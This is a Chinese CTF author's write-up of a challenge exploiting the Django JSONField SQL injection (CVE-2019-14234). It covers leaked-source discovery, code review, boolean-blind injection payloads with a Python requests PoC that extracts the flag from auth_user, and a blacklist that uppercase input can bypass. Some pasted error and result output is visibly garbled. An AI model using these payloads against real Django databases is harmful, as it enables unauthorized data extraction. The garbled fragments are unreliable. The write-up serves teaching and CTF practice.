概述

cve-2019-14234 django jsonfield 注入

此处构造了一个插入数据库和查询数据库的操作,其中查询的操作是可以控制注入的

接口两个

```
http://ip/save/?ip=1.1.1.1&domain=example.com
http://ip/query/?domain=example.com
```

代码泄露

首页图路径

```
http://ip/static
```

扫描可得存在 http://ip/static/www.zip。

```
Hint 1: I love something else beside Assassins creed. :)
Hint 2: There is something interesting in /static, try to find it. :)
```

一早上过去了,没有人扫到www.zip,因为一般的扫描器没有开启递归扫描,dirmap修改配置文件开启递归可以很快扫到。给了hint1和hint2之后,有两个同学扫到了www.zip,下午更晚一点的时候第三个同学扫到了www.zip。

在hint2的基础上,可以直接扫 ip:port/static ,一般情况下可以在半分钟内扫到泄露的代码。

审计

下载后审计代码,可以找到

```
# ip/views.py
def query_ip(request):
    dic = request.GET
    dic = dict(dic)
    if len(dic) == 0:
```

```
return render(request, 'query.html')

# good idea for all kind of query
dic = {f"ip_{k}": dic[k][0] for k in dic}
print(dic)
my_ip = MyIP.objects.filter(**dic).all().values()
my_ip = [item for item in my_ip]

return JsonResponse(my_ip, safe=False)
```

其中两行是bug的起源,参考 https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-201
9-14234.html

```
dic = {f"ip__{k}": dic[k][0] for k in dic}
my_ip = MyIP.objects.filter(**dic).all().values()
```

此处控制 domain 处,造成sql注入

```
http://ip/query/?do%27main=example.com
```

因为在题目里面,django关闭了debug,遇到错误直接返回500,如果语句构造正确,那么返回200。 因为已经有views.py了,本地可以新建一个django项目,把views.py放进去,可以直接调试构造的sql语句。

```
ProgrammingError at /query/

Syntax error at or near "') = '"

LINE 1: ...nd sleep 3') = '""' AND ("ip_myip"."ip" -> 'doma')') = '""')

Request Method: GET
Request URL: http://127.0.0.1:8000/query/?doma%27);and%20sleep%203;
Django Version: 2.2.3

Exception Type: ProgrammingError

Exception Value: syntax error at or near "') = '"

Exception Value: syntax error at or near "') = '"

Exception Value: Syntax error at or near "') = '"

Exception Location: C.\Users\uyuy\Desktop\your_ip\venv\lib\site-packages\django\db\backends\utils.py in_execute, line 84

Python Executable: C.\Users\uyuy\Desktop\your_ip\venv\Scripts\uybton.exe

Python Path: ['C:\Users\uyun\Desktop\your_ip\venv\Scripts\uybton.exe

Python Path: ['C:\Users\uyun\Desktop\your_ip\venv\int\uybton.exe\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update\update
```

构造Poc

布尔盲注 如果2>1的条件成立,那么返回结果,如果2>1不成立,那么返回空

```
def fun(poc):
    url = f"http://ip:8029/query/?domain{poc}=b"
    r = requests.get(url)
    print(r.text)
fun("""')>'1' or 2>1--""") #
```

因为这里不会返回注入的结果,此处可以使用布尔盲注的方式来判断数据。

124.16.75.162:31056/query/?domain')>'1' or 2>1--=b



[("id": 1, "ip": "a", "domain": "b")), ("id": 2, "ip": ("ip": "127.0.0.1", "domain": "53")), ("id": 3, "ip": ("ip": "127.0.0.1", "domain": "127.0.0.1")), ("id": 4, "ip": ("ip": "127.0.0.1")), ("id": 4, "ip": ("ip": "127.0.0.1")), ("id": 4, "ip": ("ip": "127.0.0.1"), ("id": 5, "ip": ("ip": "127.0.0.1")), ("id": 6.125.30.255", "domain": "127.0.0.1")), ("id": 7, "ip": ("ip": "111", "domain": "127.0.0.1"), ("id": 13, "ip": ("ip": "111", "domain": "127.0.0.1"), ("id": 13, "ip": ("ip": "127.0.0.1", "domain": "127.0.0.1"), ("id": 13, "ip": ("ip": "127.0.0.1", "domain": "127.0.0.0.1", "domain": "127.0.0.0.1", "domain": "127.0.0.0.1", "domain": "227.0.0.0.0.1", "dom

http://124.16.75.162:31056/query/?domain%27)%3E%271%27%20or%202%3C1--=b



因此可以构造一个简单的盲注脚本

```
def bool_blind(poc):
    url = f"http://ip:8029/query/?domain')>'1' or {poc}--=b"
    print(url)
    r = requests.get(url)
    print(r.text)
```

接下来就是常规的猜表名长度,猜表名,列名的阶段

比如猜当前数据库的库名的第一个字符:

```
bool_blind("(select ascii(substr(current_database(),1,1))) between 30 and 98")
```

不给第三条hint也不会影响做题,但是考虑到表比较多,爆破可能花时间,所以直接给了hint。本地新建一个工程,运行 docker-entrypoint.sh 的内容可以看到flag在 auth_user 表,省略了猜表名猜列名的步骤,直接到爆破flag的阶段。

```
Hint 3:

$ cat docker-entrypoint.sh

#!/bin/bash

set -ex

cd /app

chmod +x wait-for-it.sh
```

```
./wait-for-it.sh -t 0 psql:5432 -- echo "postgres is up"

python manage.py makemigrations
python manage.py migrate
python manage.py shell -c "from django.contrib.auth.models import User;
User.objects.create_user('flag', 'flag{fake_flag}', 'this_is_not_important') if
not User.objects.filter(username='flag').exists() else 0;"

exec "$@"%

You'd better create your own web server in your local computer to find the table
name, column name and debug your POC.
```

最终 poc

最终payload呼之欲出:

爆破flag字符串第一位的ascii码

```
bool_blind("(select ascii(substr((select email from auth_user),1,1))) between 0
and 102")
```

写脚本修改上限,或者人工二分,都可以快速得到flag

跋

代码泄露这个阶段卡了大家这么久,这个我得给大家道歉,我没想到这里会是第一个坑,好在连给了两个hint之后,终于有一位同学扫到了/static/www.zip,然后可能和他一起做题的另一个同学,也直接访问了这个路径。没过多久,就看到构造的 ip{poc}=xxx 打了过来,以为很快这题就会被秒了,因为已经构造出了布尔盲注的条件了,就差修改之后的判断语句了,可是很遗憾,这两位同学还是没有做出来这道题。

因为flag是在数据库里面,而这里可以使用 postgres 的命令执行拿到数据库的shell,但是此处拿到了 shell也不能拿到flag,因为有shell也无法登录到数据库里面,也就无法拿到flag,所以我想过在数据库里面也放同样的一个flag,但是最终放弃了这个想法,而是写了个蹩脚的黑名单过滤,让做题的同学回到注入的思路中,结果忽略了大小写可以绕过:(日志里面看到这两位同学的大写的 CMD_EXEC 打了过来,心里一惊:)不过最后还是没有拿到shell

```
def check_danger_string(s: str):
    ban_list = ['cmd', 'shell', 'exec', 'cyberpunk']
    for item in ban_list:
        if item in s:
            return False
    return True
```

159.226.95.* yunsle 同学扫了挺久的,看日志很多次都和www.zip 擦肩而过,感觉这个扫描器可能不大好使,后来和他交流之后看到他扫到了源码,很快也在日志里面看到了yunsle开始构造poc,可是时间已经不够了:)

虽然没有同学做出来这道题,不过看同学们做题还是开心的一天啊:)



Les1ie 2021年1月10日00:11:58